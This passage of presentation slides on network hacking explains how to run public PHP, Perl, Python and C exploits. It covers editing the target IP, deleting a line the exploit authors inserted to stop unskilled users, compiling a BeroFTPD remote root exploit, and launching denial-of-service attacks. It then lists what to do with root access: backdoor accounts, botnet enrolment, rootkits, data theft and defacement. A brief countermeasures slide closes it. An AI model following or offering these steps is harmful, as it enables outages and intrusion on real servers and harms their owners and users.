• On line 13 of this exploit you will see: $address = gethostbyname('192.168.1.3'); edit here the IP address of the target
• Save this edited file into the PHP directory on your server that contains the PHP executable file. In WAMP the directory would be C:\wamp\bin\php\php5.2.5
• To run it simply type in "php exploit.php" and hit enter
• When skilled hackers create exploits, they sometimes insert mistakes or extra code so that script kiddies with no programming knowledge wouldn't be able to use them
• At line 18 of this exploit, we have $junk.="../../../sun-tzu/../../../sun-tzu/../../../sun-tzu"; Just remove this line and the error will disappear
• A DoS attack will be launched; the target website up until you exit the command screen
• The site will begin to lag and it'll take a long time to load pages. Eventually the server may go down completely
52. Network Hacking Techniques
Penetrating
DOS perl exploit: http://milw0rm.com/exploits/6581
• Download and install the appropriate version of ActivePerl
• Edit the options like the target server and others as needed. Then save the file as "exploit.pl". As you can see, Perl exploits begin with "#!/usr/bin/perl"
• Run the exploit by typing: "perl exploit.pl"
Python, C/C++ on Linux
• Python exploit: http://milw0rm.com/exploits/3523
• Most C/C++ exploit code is made to be compiled in Linux
• Save the remote root exploit http://milw0rm.com/exploits/269 as "exploit.c"
• Install a development package of all the libraries and headers needed to compile C/C++ scripts by sudo apt-get install build-essential
• Once the hacker ran the script against a vulnerable server running BeroFTPD 1.3.4 and the script worked, the hacker would now have root access to the server
53. Network Hacking Techniques
Penetrating
C/C++ on Windows
• To run in Windows, you can use Cygwin
• Cygwin is a Linux-like environment that runs in Windows and acts as a Linux emulation layer, allowing you to run Linux scripts in Windows
• Download Cygwin from http://www.cygwin.com/
• Using the same exploit as the last example, save and move it into the "C:\cygwin" directory as "exploit.c"
• In the "C:\cygwin" directory do "gcc exploit.c -o exploit"
• To run the file "exploit.exe", simply type "./exploit"
• You get the root access to the target computer
54. Network Hacking Techniques
Penetrating
root access
Once you get root access, you can do
• Add yourself as a permanent user for future access
• Add the server into your botnet collection so he could use it as a weapon against other servers
• Use it as a proxy to hack other websites
• Install a rootkit so he can come back and have full control over the server when needed
• Constantly steal information as it comes
• Use the system to store illegal data
• Deface the website and sometimes the hacker will delete everything off of the server
55. Network Hacking Countermeasures
Network Hacking
Countermeasures
• Keep all your software up to date
• There will always be new vulnerabilities coming out, and your responsibility is to patch them immediately after a patch comes out
• Implement a firewall. This will keep most of the bad data out and good data in
• Install anti-virus software
• Scan your system with a vulnerability scanner. This may reveal possible vulnerabilities in your system
56. References
References
• http://www.learn-how-to-hack.net
• http://www.MrCracker.com
• http://hackthisway.com
Presentation available at http://akdhamija.webs.com/
For any clarification, mail me at dhamija.ak@gmail.com